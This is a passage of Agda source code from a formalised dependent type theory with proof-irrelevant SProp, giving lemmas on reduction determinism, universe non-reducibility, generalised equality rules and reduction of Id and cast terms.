(whnfRedTerm d′ sucₙ) whrDetTerm (cast-ℕ-cong x d) (cast-ℕ-0 x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (cast-ℕ-cong x d) (cast-ℕ-S x₁ x₂) = ⊥-elim (whnfRedTerm d sucₙ) {-# CATCHALL #-} whrDetTerm d (conv d′ x₁) = whrDetTerm d d′ whrDet (univ x) (univ x₁) = whrDetTerm x x₁ whrDet↘Term : ∀{Γ t u A l u′} (d : Γ ⊢ t ↘ u ∷ A ^ l) (d′ : Γ ⊢ t ⇒* u′ ∷ A ^ l) → Γ ⊢ u′ ⇒* u ∷ A ^ l whrDet↘Term (proj₁ , proj₂) (id x) = proj₁ whrDet↘Term (id x , proj₂) (x₁ ⇨ d′) = ⊥-elim (whnfRedTerm x₁ proj₂) whrDet↘Term (x ⇨ proj₁ , proj₂) (x₁ ⇨ d′) = whrDet↘Term (PE.subst (λ x₂ → _ ⊢ x₂ ↘ _ ∷ _ ^ _) (whrDetTerm x x₁) (proj₁ , proj₂)) d′ whrDet*Term : ∀{Γ t u A A' l u′ } (d : Γ ⊢ t ↘ u ∷ A ^ l) (d′ : Γ ⊢ t ↘ u′ ∷ A' ^ l) → u PE.≡ u′ whrDet*Term (id x , proj₂) (id x₁ , proj₄) = PE.refl whrDet*Term (id x , proj₂) (x₁ ⇨ proj₃ , proj₄) = ⊥-elim (whnfRedTerm x₁ proj₂) whrDet*Term (x ⇨ proj₁ , proj₂) (id x₁ , proj₄) = ⊥-elim (whnfRedTerm x proj₄) whrDet*Term (x ⇨ proj₁ , proj₂) (x₁ ⇨ proj₃ , proj₄) = whrDet*Term (proj₁ , proj₂) (PE.subst (λ x₂ → _ ⊢ x₂ ↘ _ ∷ _ ^ _) (whrDetTerm x₁ x) (proj₃ , proj₄)) whrDet* : ∀{Γ A B B′ r r'} (d : Γ ⊢ A ↘ B ^ r) (d′ : Γ ⊢ A ↘ B′ ^ r') → B PE.≡ B′ whrDet* (id x , proj₂) (id x₁ , proj₄) = PE.refl whrDet* (id x , proj₂) (x₁ ⇨ proj₃ , proj₄) = ⊥-elim (whnfRed x₁ proj₂) whrDet* (x ⇨ proj₁ , proj₂) (id x₁ , proj₄) = ⊥-elim (whnfRed x proj₄) whrDet* (A⇒A′ ⇨ A′⇒*B , whnfB) (A⇒A″ ⇨ A″⇒*B′ , whnfB′) = whrDet* (A′⇒*B , whnfB) (PE.subst (λ x → _ ⊢ x ↘ _ ^ _ ) (whrDet A⇒A″ A⇒A′) (A″⇒*B′ , whnfB′)) -- Identity of syntactic reduction idRed:*: : ∀ {Γ A r} → Γ ⊢ A ^ r → Γ ⊢ A :⇒*: A ^ r idRed:*: A = [[ A , A , id A ]] idRedTerm:*: : ∀ {Γ A l t} → Γ ⊢ t ∷ A ^ [ ! , l ] → Γ ⊢ t :⇒*: t ∷ A ^ l idRedTerm:*: t = [[ t , t , id t ]] -- U cannot be a term UnotInA : ∀ {A Γ r r'} → Γ ⊢ (Univ r ¹) ∷ A ^ r' → ⊥ UnotInA (conv U∷U x) = UnotInA U∷U UnotInA[t] : ∀ {A B t a Γ r r' r'' r'''} → t [ a ] PE.≡ (Univ r ¹) → Γ ⊢ a ∷ A ^ r' → Γ ∙ A ^ r'' ⊢ t ∷ B ^ r''' → ⊥ UnotInA[t] () x₁ (univ 0<1 x₂) UnotInA[t] () x₁ (ℕⱼ x₂) UnotInA[t] () x₁ (Emptyⱼ x₂) UnotInA[t] () x₁ (Πⱼ _ ▹ _ ▹ x₂ ▹ x₃) UnotInA[t] x₁ x₂ (var x₃ here) rewrite x₁ = UnotInA x₂ UnotInA[t] () x₂ (var x₃ (there x₄)) UnotInA[t] () x₁ (lamⱼ _ _ x₂ x₃) UnotInA[t] () x₁ (x₂ ∘ⱼ x₃) UnotInA[t] () x₁ (zeroⱼ x₂) UnotInA[t] () x₁ (sucⱼ x₂) UnotInA[t] () x₁ (natrecⱼ x₂ x₃ x₄ x₅) UnotInA[t] () x₁ (Emptyrecⱼ x₂ x₃) UnotInA[t] x x₁ (conv x₂ x₃) = UnotInA[t] x x₁ x₂ redU*Term′ : ∀ {A B U′ l Γ r} → U′ PE.≡ (Univ r ¹) → Γ ⊢ A ⇒ U′ ∷ B ^ l → ⊥ redU*Term′ U′≡U (conv A⇒U x) = redU*Term′ U′≡U A⇒U redU*Term′ () (app-subst A⇒U x) redU*Term′ U′≡U (β-red _ _ x x₁ x₂) = UnotInA[t] U′≡U x₂ x₁ redU*Term′ () (natrec-subst x x₁ x₂ A⇒U) redU*Term′ U′≡U (natrec-zero x x₁ x₂) rewrite U′≡U = UnotInA x₁ redU*Term′ () (natrec-suc x x₁ x₂ x₃) redU*Term : ∀ {A B l Γ r} → Γ ⊢ A ⇒* (Univ r ¹) ∷ B ^ l → ⊥ redU*Term (id x) = UnotInA x redU*Term (x ⇨ A⇒*U) = redU*Term A⇒*U -- Nothing reduces to U redU : ∀ {A Γ r l } → Γ ⊢ A ⇒ (Univ r ¹) ^ [ ! , l ] → ⊥ redU (univ x) = redU*Term′ PE.refl x redU* : ∀ {A Γ r l } → Γ ⊢ A ⇒* (Univ r ¹) ^ [ ! , l ] → A PE.≡ (Univ r ¹) redU* (id x) = PE.refl redU* (x ⇨ A⇒*U) rewrite redU* A⇒*U = ⊥-elim (redU x) -- convertibility for irrelevant terms implies typing typeInversion : ∀ {t u A l Γ} → Γ ⊢ t ≡ u ∷ A ^ [ % , l ] → Γ ⊢ t ∷ A ^ [ % , l ] typeInversion (conv X x) = let d = typeInversion X in conv d x typeInversion (proof-irrelevance x x₁) = x -- general version of reflexivity, symmetry and transitivity genRefl : ∀ {A Γ t r l } → Γ ⊢ t ∷ A ^ [ r , l ] → Γ ⊢ t ≡ t ∷ A ^ [ r , l ] genRefl {r = !} d = refl d genRefl {r = %} d = proof-irrelevance d d -- Judgmental instance of the equality relation genSym : ∀ {k l A Γ r lA } → Γ ⊢ k ≡ l ∷ A ^ [ r , lA ] → Γ ⊢ l ≡ k ∷ A ^ [ r , lA ] genSym {r = !} = sym genSym {r = %} (proof-irrelevance x x₁) = proof-irrelevance x₁ x genSym {r = %} (conv x x₁) = conv (genSym x) x₁ genTrans : ∀ {k l m A r Γ lA } → Γ ⊢ k ≡ l ∷ A ^ [ r , lA ] → Γ ⊢ l ≡ m ∷ A ^ [ r , lA ] → Γ ⊢ k ≡ m ∷ A ^ [ r , lA ] genTrans {r = !} = trans genTrans {r = %} (conv X x) (conv Y x₁) = conv (genTrans X (conv Y (trans x₁ (sym x)))) x genTrans {r = %} (conv X x) (proof-irrelevance x₁ x₂) = proof-irrelevance (conv (typeInversion X) x) x₂ genTrans {r = %} (proof-irrelevance x x₁) (conv Y x₂) = proof-irrelevance x (conv (typeInversion (genSym Y)) x₂) genTrans {r = %} (proof-irrelevance x x₁) (proof-irrelevance x₂ x₃) = proof-irrelevance x x₃ genVar : ∀ {x A Γ r l } → Γ ⊢ var x ∷ A ^ [ r , l ] → Γ ⊢ var x ≡ var x ∷ A ^ [ r , l ] genVar {r = !} = refl genVar {r = %} d = proof-irrelevance d d toLevelInj : ∀ {l₁ l₁′ : TypeLevel} {l<₁ : l₁′ <∞ l₁} {l₂ l₂′ : TypeLevel} {l<₂ : l₂′ <∞ l₂} → toLevel l₁′ PE.≡ toLevel l₂′ → l₁′ PE.≡ l₂′ toLevelInj {.(ι ¹)} {.(ι ⁰)} {emb<} {.(ι ¹)} {.(ι ⁰)} {emb<} e = PE.refl toLevelInj {.∞} {.(ι ¹)} {∞<} {.(ι ¹)} {.(ι ⁰)} {emb<} () toLevelInj {.∞} {.(ι ¹)} {∞<} {.∞} {.(ι ¹)} {∞<} e = PE.refl redSProp′ : ∀ {Γ A B l} (D : Γ ⊢ A ⇒* B ∷ SProp l ^ next l ) → Γ ⊢ A ⇒* B ^ [ % , ι l ] redSProp′ (id x) = id (univ x) redSProp′ (x ⇨ D) = univ x ⇨ redSProp′ D redSProp : ∀ {Γ A B l} (D : Γ ⊢ A :⇒*: B ∷ SProp l ^ next l ) → Γ ⊢ A :⇒*: B ^ [ % , ι l ] redSProp [[ ⊢t , ⊢u , d ]] = [[ (univ ⊢t) , (univ ⊢u) , redSProp′ d ]] un-univ : ∀ {A r Γ l} → Γ ⊢ A ^ [ r , ι l ] → Γ ⊢ A ∷ Univ r l ^ [ ! , next l ] un-univ (univ x) = x un-univ≡ : ∀ {A B r Γ l} → Γ ⊢ A ≡ B ^ [ r , ι l ] → Γ ⊢ A ≡ B ∷ Univ r l ^ [ ! , next l ] un-univ≡ (univ x) = x un-univ≡ (refl x) = refl (un-univ x) un-univ≡ (sym X) = sym (un-univ≡ X) un-univ≡ (trans X Y) = trans (un-univ≡ X) (un-univ≡ Y) univ-gen : ∀ {r Γ l} → (⊢Γ : ⊢ Γ) → Γ ⊢ Univ r l ^ [ ! , next l ] univ-gen {l = ⁰} ⊢Γ = univ (univ 0<1 ⊢Γ ) univ-gen {l = ¹} ⊢Γ = Uⱼ ⊢Γ un-univ⇒ : ∀ {l Γ A B r} → Γ ⊢ A ⇒ B ^ [ r , ι l ] → Γ ⊢ A ⇒ B ∷ Univ r l ^ next l un-univ⇒ (univ x) = x univ⇒* : ∀ {l Γ A B r} → Γ ⊢ A ⇒* B ∷ Univ r l ^ next l → Γ ⊢ A ⇒* B ^ [ r , ι l ] univ⇒* (id x) = id (univ x) univ⇒* (x ⇨ D) = univ x ⇨ univ⇒* D un-univ⇒* : ∀ {l Γ A B r} → Γ ⊢ A ⇒* B ^ [ r , ι l ] → Γ ⊢ A ⇒* B ∷ Univ r l ^ next l un-univ⇒* (id x) = id (un-univ x) un-univ⇒* (x ⇨ D) = un-univ⇒ x ⇨ un-univ⇒* D univ:⇒*: : ∀ {l Γ A B r} → Γ ⊢ A :⇒*: B ∷ Univ r l ^ next l → Γ ⊢ A :⇒*: B ^ [ r , ι l ] univ:⇒*: [[ ⊢A , ⊢B , D ]] = [[ (univ ⊢A) , (univ ⊢B) , (univ⇒* D) ]] un-univ:⇒*: : ∀ {l Γ A B r} → Γ ⊢ A :⇒*: B ^ [ r , ι l ] → Γ ⊢ A :⇒*: B ∷ Univ r l ^ next l un-univ:⇒*: [[ ⊢A , ⊢B , D ]] = [[ (un-univ ⊢A) , (un-univ ⊢B) , (un-univ⇒* D) ]] IdRed*Term′ : ∀ {Γ A B t u l} (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι l ]) (⊢u : Γ ⊢ u ∷ A ^ [ ! , ι l ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι l ]) → Γ ⊢ Id A t u ⇒* Id B t u ∷ SProp l ^ next l IdRed*Term′ ⊢t ⊢u (id (univ ⊢A)) = id (Idⱼ ⊢A ⊢t ⊢u) IdRed*Term′ ⊢t ⊢u (univ d ⇨ D) = Id-subst d ⊢t ⊢u ⇨ IdRed*Term′ (conv ⊢t (subset (univ d))) (conv ⊢u (subset (univ d))) D IdRed*Term : ∀ {Γ A B t u l} (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι l ]) (⊢u : Γ ⊢ u ∷ A ^ [ ! , ι l ]) (D : Γ ⊢ A :⇒*: B ^ [ ! , ι l ]) → Γ ⊢ Id A t u :⇒*: Id B t u ∷ SProp l ^ next l IdRed*Term {Γ} {A} {B} ⊢t ⊢u [[ univ ⊢A , univ ⊢B , D ]] = [[ Idⱼ ⊢A ⊢t ⊢u , Idⱼ ⊢B (conv ⊢t (subset* D)) (conv ⊢u (subset* D)) , IdRed*Term′ ⊢t ⊢u D ]] IdRed* : ∀ {Γ A B t u l} (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι l ]) (⊢u : Γ ⊢ u ∷ A ^ [ ! , ι l ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι l ]) → Γ ⊢ Id A t u ⇒* Id B t u ^ [ % , ι l ] IdRed* ⊢t ⊢u (id ⊢A) = id (univ (Idⱼ (un-univ ⊢A) ⊢t ⊢u)) IdRed* ⊢t ⊢u (d ⇨ D) = univ (Id-subst (un-univ⇒ d) ⊢t ⊢u) ⇨ IdRed* (conv ⊢t (subset d)) (conv ⊢u (subset d)) D CastRed*Term′ : ∀ {Γ A B X e t} (⊢X : Γ ⊢ X ^ [ ! , ι ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) A X ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ A X e t ⇒* cast ⁰ B X e t ∷ X ^ ι ⁰ CastRed*Term′ (univ ⊢X) ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ ⊢A ⊢X ⊢e ⊢t) CastRed*Term′ (univ ⊢X) ⊢e ⊢t (univ d ⇨ D) = cast-subst d ⊢X ⊢e ⊢t ⇨ CastRed*Term′ (univ ⊢X) (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢t))) (subsetTerm d) (refl ⊢X)) )) (conv ⊢t (subset (univ d))) D CastRed*Term : ∀ {Γ A B X t e} (⊢X : Γ ⊢ X ^ [ ! , ι ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) A X ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ A ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A :⇒*: B ∷ U ⁰ ^ next ⁰) → Γ ⊢ cast ⁰ A X e t :⇒*: cast ⁰ B X e t ∷ X ^ ι ⁰ CastRed*Term {Γ} {A} {B} (univ ⊢X) ⊢e ⊢t [[ ⊢A , ⊢B , D ]] = [[ castⱼ ⊢A ⊢X ⊢e ⊢t , castⱼ ⊢B ⊢X (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢t))) (subset*Term D) (refl ⊢X)) )) (conv ⊢t (univ (subset*Term D))) , CastRed*Term′ (univ ⊢X) ⊢e ⊢t (univ* D) ]] CastRed*Termℕ′ : ∀ {Γ A B e t} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ ℕ A e t ⇒* cast ⁰ ℕ B e t ∷ A ^ ι ⁰ CastRed*Termℕ′ ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ (ℕⱼ (wfTerm ⊢A)) ⊢A ⊢e ⊢t) CastRed*Termℕ′ ⊢e ⊢t (univ d ⇨ D) = cast-ℕ-subst d ⊢e ⊢t ⇨ conv* (CastRed*Termℕ′ (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl (ℕⱼ (wfTerm ⊢e))) (subsetTerm d))) ) ⊢t D) (sym (subset (univ d))) CastRed*Termℕ : ∀ {Γ A B e t} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A :⇒*: B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ ℕ A e t :⇒*: cast ⁰ ℕ B e t ∷ A ^ ι ⁰ CastRed*Termℕ ⊢e ⊢t [[ ⊢A , ⊢B , D ]] = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (un-univ ⊢A) ⊢e ⊢t , conv (castⱼ (ℕⱼ (wfTerm ⊢e)) (un-univ ⊢B) (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl (ℕⱼ (wfTerm ⊢e))) (subset*Term (un-univ⇒* D))))) ⊢t) (sym (subset* D)) , CastRed*Termℕ′ ⊢e ⊢t D ]] CastRed*Termℕℕ′ : ∀ {Γ e t u} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ⇒* u ∷ ℕ ^ ι ⁰ ) → Γ ⊢ cast ⁰ ℕ ℕ e t ⇒* cast ⁰ ℕ ℕ e u ∷ ℕ ^ ι ⁰ CastRed*Termℕℕ′ ⊢e (id ⊢t) = id (castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢t) CastRed*Termℕℕ′ ⊢e (d ⇨ D) = cast-ℕ-cong ⊢e d ⇨ CastRed*Termℕℕ′ ⊢e D CastRed*Termℕℕ : ∀ {Γ e t u} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t :⇒*: u ∷ ℕ ^ ι ⁰ ) → Γ ⊢ cast ⁰ ℕ ℕ e t :⇒*: cast ⁰ ℕ ℕ e u ∷ ℕ ^ ι ⁰ CastRed*Termℕℕ ⊢e [[ ⊢t , ⊢u , D ]] = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢t , castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢u , CastRed*Termℕℕ′ ⊢e D ]] CastRed*Termℕsuc : ∀ {Γ e n} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) (⊢n : Γ ⊢ n ∷ ℕ ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ ℕ ℕ e (suc n) :⇒*: suc (cast ⁰ ℕ ℕ e n) ∷ ℕ ^ ι ⁰ CastRed*Termℕsuc ⊢e ⊢n = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e (sucⱼ ⊢n) , sucⱼ (castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢n) , cast-ℕ-S ⊢e ⊢n ⇨ id (sucⱼ (castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e ⊢n)) ]] CastRed*Termℕzero : ∀ {Γ e} (⊢e : Γ ⊢ e ∷ Id (U ⁰) ℕ ℕ ^ [ % , next ⁰ ]) → Γ ⊢ cast ⁰ ℕ ℕ e zero :⇒*: zero ∷ ℕ ^ ι ⁰ CastRed*Termℕzero ⊢e = [[ castⱼ (ℕⱼ (wfTerm ⊢e)) (ℕⱼ (wfTerm ⊢e)) ⊢e (zeroⱼ (wfTerm ⊢e)) , zeroⱼ (wfTerm ⊢e) , cast-ℕ-0 ⊢e ⇨ id (zeroⱼ (wfTerm ⊢e)) ]] CastRed*TermΠ′ : ∀ {Γ F rF G A B e t} (⊢F : Γ ⊢ F ∷ (Univ rF ⁰) ^ [ ! , next ⁰ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , next ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A e t ⇒* cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) B e t ∷ A ^ ι ⁰ CastRed*TermΠ′ ⊢F ⊢G ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢A ⊢e ⊢t) CastRed*TermΠ′ ⊢F ⊢G ⊢e ⊢t (univ d ⇨ D) = cast-Π-subst ⊢F ⊢G d ⊢e ⊢t ⇨ conv* (CastRed*TermΠ′ ⊢F ⊢G (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G)) (subsetTerm d))) ) ⊢t D) (sym (subset (univ d))) CastRed*TermΠ : ∀ {Γ F rF G A B e t} (⊢F : Γ ⊢ F ∷ (Univ rF ⁰) ^ [ ! , next ⁰ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , next ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A :⇒*: B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A e t :⇒*: cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) B e t ∷ A ^ ι ⁰ CastRed*TermΠ ⊢F ⊢G ⊢e ⊢t [[ ⊢A , ⊢B , D ]] = let [Π] = Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G in [[ castⱼ [Π] (un-univ ⊢A) ⊢e ⊢t , conv (castⱼ [Π] (un-univ ⊢B) (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wfTerm ⊢e))) (refl [Π]) (subset*Term (un-univ⇒* D))))) ⊢t) (sym (subset* D)) , CastRed*TermΠ′ ⊢F ⊢G ⊢e ⊢t D ]] IdURed*Term′ : ∀ {Γ t t′ u} (⊢t : Γ ⊢ t ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t′ : Γ ⊢ t′ ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t ⇒* t′ ∷ U ⁰ ^ ι ¹) (⊢u : Γ ⊢ u ∷ U ⁰ ^ [ ! , ι ¹ ]) → Γ ⊢ Id (U ⁰) t u ⇒* Id (U ⁰) t′ u ∷ SProp ¹ ^ ∞ IdURed*Term′ ⊢t ⊢t′ (id x) ⊢u = id (Idⱼ (univ 0<1 (wfTerm ⊢t)) ⊢t ⊢u) IdURed*Term′ ⊢t ⊢t′ (x ⇨ d) ⊢u = _⇨_ (Id-U-subst x ⊢u) (IdURed*Term′ (redFirst*Term d) ⊢t′ d ⊢u) IdURed*Term : ∀ {Γ t t′ u} (d : Γ ⊢ t :⇒*: t′ ∷ U ⁰ ^ ι ¹) (⊢u : Γ ⊢ u ∷ U ⁰ ^ [ ! , ι ¹ ]) → Γ ⊢ Id (U ⁰) t u :⇒*: Id (U ⁰) t′ u ∷ SProp ¹ ^ ∞ IdURed*Term [[ ⊢t , ⊢t′ , d ]] ⊢u = [[ Idⱼ (univ 0<1 (wfTerm ⊢u)) ⊢t ⊢u , Idⱼ (univ 0<1 (wfTerm ⊢u)) ⊢t′ ⊢u , IdURed*Term′ ⊢t ⊢t′ d ⊢u ]] IdUΠRed*Term′ : ∀ {Γ F rF G t t′} (⊢F : Γ ⊢ F ∷ Univ rF ⁰ ^ [ ! , ι ¹ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t : Γ ⊢ t ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t′ : Γ ⊢ t′ ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t ⇒* t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t ⇒* Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t′ ∷ SProp ¹ ^ ∞ IdUΠRed*Term′ ⊢F ⊢G ⊢t ⊢t′ (id x) = id (Idⱼ (univ 0<1 (wfTerm ⊢t)) (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢t) IdUΠRed*Term′ ⊢F ⊢G ⊢t ⊢t′ (x ⇨ d) = _⇨_ (Id-U-Π-subst ⊢F ⊢G x) (IdUΠRed*Term′ ⊢F ⊢G (redFirst*Term d) ⊢t′ d) IdUΠRed*Term : ∀ {Γ F rF G t t′} (⊢F : Γ ⊢ F ∷ Univ rF ⁰ ^ [ ! , ι ¹ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t :⇒*: t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t :⇒*: Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) t′ ∷ SProp ¹ ^ ∞ IdUΠRed*Term ⊢F ⊢G [[ ⊢t , ⊢t′ , d ]] = [[ Idⱼ (univ 0<1 (wfTerm ⊢t)) (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢t , Idⱼ (univ 0<1 (wfTerm ⊢t)) (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ ⊢F ▹ ⊢G) ⊢t′ , IdUΠRed*Term′ ⊢F ⊢G ⊢t ⊢t′ d ]] IdℕRed*Term′ : ∀ {Γ t t′ u} (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢t′ : Γ ⊢ t′ ∷ ℕ ^ [ ! , ι ⁰ ]) (d : Γ ⊢ t ⇒* t′ ∷ ℕ ^ ι ⁰) (⊢u : Γ ⊢ u ∷ ℕ ^ [ ! , ι ⁰ ]) → Γ ⊢ Id ℕ t u ⇒* Id ℕ t′ u ∷ SProp ⁰ ^ next ⁰ IdℕRed*Term′ ⊢t ⊢t′ (id x) ⊢u = id (Idⱼ (ℕⱼ (wfTerm ⊢u)) ⊢t ⊢u) IdℕRed*Term′ ⊢t ⊢t′ (x ⇨ d) ⊢u = _⇨_ (Id-ℕ-subst x ⊢u) (IdℕRed*Term′ (redFirst*Term d) ⊢t′ d ⊢u) Idℕ0Red*Term′ : ∀ {Γ t t′} (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢t′ : Γ ⊢ t′ ∷ ℕ ^ [ ! , ι ⁰ ]) (d : Γ ⊢ t ⇒* t′ ∷ ℕ ^ ι ⁰) → Γ ⊢ Id ℕ zero t ⇒* Id ℕ zero t′ ∷ SProp ⁰ ^ next ⁰ Idℕ0Red*Term′ ⊢t ⊢t′ (id x) = id (Idⱼ (ℕⱼ (wfTerm ⊢t)) (zeroⱼ (wfTerm ⊢t)) ⊢t) Idℕ0Red*Term′ ⊢t ⊢t′ (x ⇨ d) = Id-ℕ-0-subst x ⇨ Idℕ0Red*Term′ (redFirst*Term d) ⊢t′ d IdℕSRed*Term′ : ∀ {Γ t u u′} (⊢t : Γ ⊢ t ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢u : Γ ⊢ u ∷ ℕ ^ [ ! , ι ⁰ ]) (⊢u′ : Γ ⊢ u′ ∷ ℕ ^ [ ! , ι ⁰ ]) (d : Γ ⊢ u ⇒* u′ ∷ ℕ ^ ι ⁰) → Γ ⊢ Id ℕ (suc t) u ⇒* Id ℕ (suc t) u′ ∷ SProp ⁰ ^ next ⁰ IdℕSRed*Term′ ⊢t ⊢u ⊢u′ (id x) = id (Idⱼ (ℕⱼ (wfTerm ⊢t)) (sucⱼ ⊢t) ⊢u) IdℕSRed*Term′ ⊢t ⊢u ⊢u′ (x ⇨ d) = Id-ℕ-S-subst ⊢t x ⇨ IdℕSRed*Term′ ⊢t (redFirst*Term d) ⊢u′ d IdUℕRed*Term′ : ∀ {Γ t t′} (⊢t : Γ ⊢ t ∷ U ⁰ ^ [ ! , ι ¹ ]) (⊢t′ : Γ ⊢ t′ ∷ U ⁰ ^ [ ! , ι ¹ ]) (d : Γ ⊢ t ⇒* t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) ℕ t ⇒* Id (U ⁰) ℕ t′ ∷ SProp ¹ ^ ∞ IdUℕRed*Term′ ⊢t ⊢t′ (id x) = id (Idⱼ (univ 0<1 (wfTerm ⊢t)) (ℕⱼ (wfTerm ⊢t) ) ⊢t) IdUℕRed*Term′ ⊢t ⊢t′ (x ⇨ d) = _⇨_ (Id-U-ℕ-subst x) (IdUℕRed*Term′ (redFirst*Term d) ⊢t′ d) IdUℕRed*Term : ∀ {Γ t t′} (d : Γ ⊢ t :⇒*: t′ ∷ U ⁰ ^ ι ¹) → Γ ⊢ Id (U ⁰) ℕ t :⇒*: Id (U ⁰) ℕ t′ ∷ SProp ¹ ^ ∞ IdUℕRed*Term [[ ⊢t , ⊢t′ , d ]] = [[ Idⱼ (univ 0<1 (wfTerm ⊢t)) (ℕⱼ (wfTerm ⊢t) ) ⊢t , Idⱼ (univ 0<1 (wfTerm ⊢t)) (ℕⱼ (wfTerm ⊢t) ) ⊢t′ , IdUℕRed*Term′ ⊢t ⊢t′ d ]] appRed* : ∀ {Γ a t u A B rA lA lB l} (⊢a : Γ ⊢ a ∷ A ^ [ rA , ι lA ]) (D : Γ ⊢ t ⇒* u ∷ (Π A ^ rA ° lA ▹ B ° lB ° l) ^ ι l) → Γ ⊢ t ∘ a ^ l ⇒* u ∘ a ^ l ∷ B [ a ] ^ ι lB appRed* ⊢a (id x) = id (x ∘ⱼ ⊢a) appRed* ⊢a (x ⇨ D) = app-subst x 